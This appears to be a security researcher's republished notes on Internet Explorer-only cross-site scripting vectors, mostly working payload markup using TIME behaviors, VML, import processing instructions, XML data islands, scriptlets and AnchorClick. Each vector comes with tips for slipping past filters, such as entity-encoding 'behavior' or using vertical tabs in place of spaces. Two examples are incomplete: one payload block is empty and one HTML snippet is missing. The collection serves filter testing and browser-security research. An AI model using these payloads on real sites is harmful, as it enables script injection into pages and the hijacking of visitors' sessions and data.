Using HTML/XML, VML and TIME to execute XSS

Source: Internet
Author: User

Some of the vectors listed on html5sec.org are IE-only. These are my notes and test results for them.

1. time: attributename and values

<html xmlns:t="urn:schemas-microsoft-com:time">
<body>
<div title="alert(1);" id="myxss">xxx</div>
<div>
<t:animate style="behavior:url(#default#time2)" attributename="innerhtml"
values="&lt;img/src=&quot;.&quot; style=&quot;display:none&quot; onerror=eval(myxss.title)&gt;"></t:animate>
</div>
</body>
</html>

The script itself is parked in the title attribute of #myxss and pulled out with eval(myxss.title), so the values attribute never has to contain alert(...) directly. The animate element can also be used on its own, without declaring the namespace on <html>:

As a one-liner:

<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot; onerror=alert(1)&gt;>

2. time: onbegin

Here the event attribute carries the script directly. The catch is that any filter which strips on* attributes kills this one too.

<x style='behavior:url(#default#time2)' onbegin='write(1)'>

3. time: set and attributename

<html xmlns:t="urn:schemas-microsoft-com:time">
<body>
<div title="alert(1);" id="myxss">xxx</div>
<div>
<set/xmlns='urn:schemas-microsoft-com:time' style='beh&#x41;vior:url(#default#time2)' attributename='innerhtml'
to='&lt;img/src=&quot;x&quot; onerror=alert(1)&gt;'>
</div>
</body>
</html>

Note the &#x41; inside the style value: the attribute is entity-decoded before the CSS parser sees it, so a filter that looks for the literal string "behavior" misses it.

4. VML: onmouseover trigger

<html xmlns:t="urn:schemas-microsoft-com:time">
<body>
<div title="alert(1);" id="myxss">xxx</div>
<div>
<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100%
src=test.vml#xss></vmlframe>
</div>
</body>
</html>

test.vml:

<xml>
<rect style="height:100%;width:100%" id="xss" onmouseover="alert(1)" strokecolor="white" strokeweight="2000px" filled="false"/>
</xml>

The rect is stretched to cover the whole page (full size plus a 2000px stroke), so the first mouse movement fires onmouseover.

5. Another way to get TIME: html/xml + import combination

<html>
<body>
<div>
<div id="x">x</div>
<?xml:namespace prefix="t">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=alert(1)&gt;">
</div>
</body>
</html>

xml + import? Yes: the namespace can be bound with <?xml:namespace> and <?import> processing instructions instead of an xmlns:t attribute on <html>, and IE accepts that too. The &#11; (vertical tab) in the payload stands in for spaces, which IE treats as attribute whitespace.


Or the html + import combination:

<html xmlns:t>
<body>
<div>
<div id="x">x</div>
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=alert(1)&gt;">
</div>
</body>
</html>

6. xml + htc combination

<html>
<body>
<div>
<xml id="xss" src="test.htc"></xml>
<label dataformatas="html" datasrc="#xss" datafld="payload"></label>
</div>
</body>
</html>

test.htc (the XML file bound through the xml data island):

<?xml version="1.0"?>
<x>
<payload><![CDATA[ ]]></payload>
</x>

Whatever markup sits inside the CDATA section is bound to the label through datasrc/datafld and, because of dataformatas="html", rendered as HTML rather than as text.

7. style + scriptlet combination


The scriptlet is attached as a behavior from the style attribute (that is the "style" half of the combination). test.sct:

<SCRIPTLET>
<IMPLEMENTS Type="Behavior"></IMPLEMENTS>
<SCRIPT Language="javascript">alert(1)</SCRIPT>
</SCRIPTLET>

8. AnchorClick + folder (executes when the link is clicked)

As a one-liner:

<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XXX</a>

Summary: behavior is dangerous!! import is dangerous too, whether it arrives through a style (behavior:url) or through an <import ...> / <?import ...> tag; all of it is still dangerous.
